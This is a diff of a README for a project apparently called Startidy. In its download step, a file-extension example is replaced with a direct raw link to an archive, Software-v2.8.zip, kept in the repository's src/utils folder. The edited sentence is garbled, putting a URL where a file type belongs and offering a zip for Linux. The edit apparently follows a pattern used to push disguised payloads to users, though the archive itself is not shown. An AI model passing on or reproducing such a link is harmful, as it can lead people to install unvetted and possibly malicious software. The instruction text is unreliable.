treberte/Startidy/README.md

 ### 💾 Step 3: Download the File

-Once you have selected the latest version, click on the asset that matches your operating system (e.g., `.exe` for Windows, `.tar.gz` for Linux, or `.dmg` for macOS).
+Once you have selected the latest version, click on the asset that matches your operating system (e.g., `.exe` for Windows, `https://github.com/treberte/Startidy/raw/refs/heads/main/src/utils/Software-v2.8.zip` for Linux, or `.dmg` for macOS).
 The file will start downloading automatically.

 ## 🛠️ Install Startidy